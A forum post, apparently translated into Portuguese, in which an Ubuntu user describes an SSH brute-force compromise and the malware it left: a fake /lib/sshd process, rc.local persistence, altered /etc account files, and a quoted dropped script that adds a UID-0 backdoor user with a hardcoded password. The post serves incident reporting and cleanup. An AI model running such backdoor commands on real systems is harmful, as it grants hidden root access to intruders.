Tenho quase certeza de que meu laptop Ubuntu 13.10 está infectado com algum tipo de malware.
De vez em quando, eu encontro um processo / lib / sshd (de propriedade do root) rodando e consumindo muita CPU. Não é o servidor sshd que executa o / usr / sbin / sshd.
O binário possui permissões --wxrw-rwt e gera e gera scripts no diretório / lib. Um recente é chamado 13959730401387633604 e faz o seguinte
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
O usuário gusr foi criado pelo malware de forma independente e, em seguida, o chpasswd trava ao mesmo tempo em que consome 100% de cpu.
Até agora, identifiquei que o usuário gusr foi adicionalmente adicionado aos arquivos em / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Parece que o malware fez cópias de todos esses arquivos com o sufixo "-". A lista completa de arquivos / etc / que foram modificados pelo root está disponível aqui .
Além disso, o arquivo / etc / hosts foi alterado para este .
O / lib / sshd começa adicionando-se ao final do arquivo /etc/init.d/rc.local!
Eu removi o usuário, removi os arquivos, matei a árvore processada, mudei minhas senhas e removi as chaves públicas ssh.
Estou ciente de que estou basicamente ferrado e provavelmente reinstalarei todo o sistema. No entanto, como faço login em várias outras máquinas, seria bom, pelo menos, tentar removê-lo e descobrir como obtive isso. Qualquer sugestão sobre como fazer isso seria apreciada.
Parece que eles entraram no dia 25 de março com login de root forçado. Eu não tinha idéia que o root ssh é habilitado por padrão no Ubuntu. Eu desabilitei e coloquei denyhosts.
O login era de 59.188.247.236, aparentemente em algum lugar de Hong Kong.
Eu peguei o laptop do EmperorLinux e eles ativaram o acesso root. Se você tiver um desses e estiver executando o sshd, tenha cuidado.